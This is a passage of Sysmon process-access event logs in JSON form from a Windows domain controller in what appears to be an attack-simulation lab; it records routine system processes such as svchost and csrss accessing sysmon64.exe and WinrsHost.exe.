{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2490,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.270\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010BE6F0400}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.270","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010BE6F0400}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2491,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.270\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.270","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2492,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.270\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.270","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2493,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.285\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.285","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2494,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.285\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.285","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2495,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.285\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.285","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2496,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.285\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.285","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2497,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.285\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.285","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2498,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.285\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 